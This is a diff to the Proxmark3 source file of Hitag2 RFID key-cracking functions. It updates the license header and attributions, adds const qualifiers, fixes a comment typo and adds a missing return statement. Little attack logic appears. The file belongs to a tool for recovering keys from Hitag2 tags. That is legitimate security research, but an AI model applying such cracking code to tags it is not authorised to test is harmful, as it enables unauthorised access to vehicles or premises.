@@ -1,12 +1,20 @@
 //-----------------------------------------------------------------------------
-// Kevin Sheldrake <kev@headhacking.com>, Aug 2018
+// Borrowed initially from https://github.com/factoritbv/hitag2hell
+// and https://github.com/AdamLaurie/RFIDler/blob/master/firmware/Pic32/RFIDler.X/src/hitag2crack.c
+// Copyright (C) Kevin Sheldrake <kev@headhacking.com>, Aug 2018
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
 //
-// This code is licensed to you under the terms of the GNU GPL, version 2 or,
-// at your option, any later version. See the LICENSE.txt file for the text of
-// the license.
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
 //
-// iceman, Jan, 2020
-// doegox, Jan, 2020
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
 //-----------------------------------------------------------------------------
 // hitag2 attack functions
 //-----------------------------------------------------------------------------
@@ -279,7 +287,7 @@ bool hitag2crack_test_e_p0cmd(uint8_t *keybits, uint8_t *nrar, uint8_t *e_cmd, u
 
 // hitag2crack_xor XORs the source with the pad to produce the target.
 // source, target and pad are binarrays of length len.
-void hitag2crack_xor(uint8_t *target, uint8_t *source, uint8_t *pad, unsigned int len) {
+void hitag2crack_xor(uint8_t *target, const uint8_t *source, const uint8_t *pad, unsigned int len) {
 
     for (int i = 0; i < len; i++) {
         target[i] = source[i] ^ pad[i];
@@ -727,10 +735,12 @@ bool hitag2crack_consume_keystream(uint8_t *keybits, int kslen, int *ksoffset, u
         return false;
     }
 
-    // dont bother decrypting the response - we already know the keybits
+    // don't bother decrypting the response - we already know the keybits
 
     // update ksoffset with command length and response
     *ksoffset += (numcmds * 10) + 32;
+
+    return true;
 }
 
 // hitag2crack_extend_keystream sends an extended command to retrieve more keybits.
